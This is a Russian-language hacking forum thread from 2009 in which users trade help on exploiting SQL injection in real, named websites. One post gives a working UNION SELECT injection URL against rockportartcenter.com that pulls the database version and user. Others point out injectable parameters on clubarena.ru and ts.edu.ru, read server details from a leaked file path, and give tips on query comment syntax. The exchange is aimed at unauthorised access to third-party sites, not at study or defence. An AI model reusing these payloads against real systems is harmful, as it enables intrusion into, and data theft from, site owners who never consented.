 |
|
03.02.2009, 03:43
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами:
9133681
Репутация:
90
|
|
Сообщение от AkyHa_MaTaTa
попробуй вместо -- использовать /*. -- комент до конца строки , /* до конца запроса или */ . А лучше линк в студию.
При /* ничего не выводиться, просто белая страница, даже если запрос с лишней кавычкой, никаких ошибок нет, просто белая страница...
З.ы. вот ссылка http://www.clubarena.ru/disco/events/2009/02/03'/
Последний раз редактировалось pinky07; 03.02.2009 в 04:38..
|
|
|
03.02.2009, 03:44
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
В любой запрос можно вклиниться... Главное понять какая там БД, хорошо бы увидеть линк...
|
|
|
|
03.02.2009, 14:13
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Всем спасибо!
Последний раз редактировалось Octave_Parango; 03.02.2009 в 15:27..
|
|
|
|
03.02.2009, 14:25
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Octave_Parango Она простейшая, если лень читать статьи, то может хотя-бы поиск по форуму?
https://forum.antichat.ru/showpost.php?p=1024484&postcount=7287
|
|
|
|
03.02.2009, 14:26
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
эм.. обычная скуля.. даже думать не надо, ибо видно запрос =\
http://www.rockportartcenter.com/exhibitions/detail.php?uid=450%27+union+select+1,2,3,4,5,6,7,8 ,version(),10,11,12,13,14,15,16,17,18,19,20,21,22, user()/*
|
|
|
|
03.02.2009, 15:08
|
|
Познающий
Регистрация: 15.11.2008
Сообщений: 32
С нами:
9203303
Репутация:
22
|
|
Вот сайт допускает запрос вида http://ts.edu.ru/.../ Можно какнить исрользовать?
|
|
|
|
03.02.2009, 15:12
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Сообщение от IIAPTUZAH
Вот сайт допускает запрос вида http://ts.edu.ru/.../ Можно какнить исрользовать?
Можно, для промотра сайта. Где ты тут видешь уязвимость? Ты поднялся корню где и так был.
|
|
|
|
03.02.2009, 15:15
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
Это даже для просмотра сайта использовать нельзя.
|
|
|
|
03.02.2009, 15:16
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от IIAPTUZAH
Вот сайт допускает запрос вида http://ts.edu.ru/.../ Можно какнить исрользовать?
судя по пути на винде стоит сайт
c:\inetpub\ts.edu.ru\includes\common.php 
и юзается MS SQL ищи скули, читай статьи
|
|
|
|
03.02.2009, 15:18
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Лучше здеся взгляни
http://ts.edu.ru/schools/region/6/?town=-1'
2 groundhog почему нельзя, я например при http://ts.edu.ru/.../
вижу сайт значит можно для просмотра  .
Последний раз редактировалось AkyHa_MaTaTa; 03.02.2009 в 15:22..
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
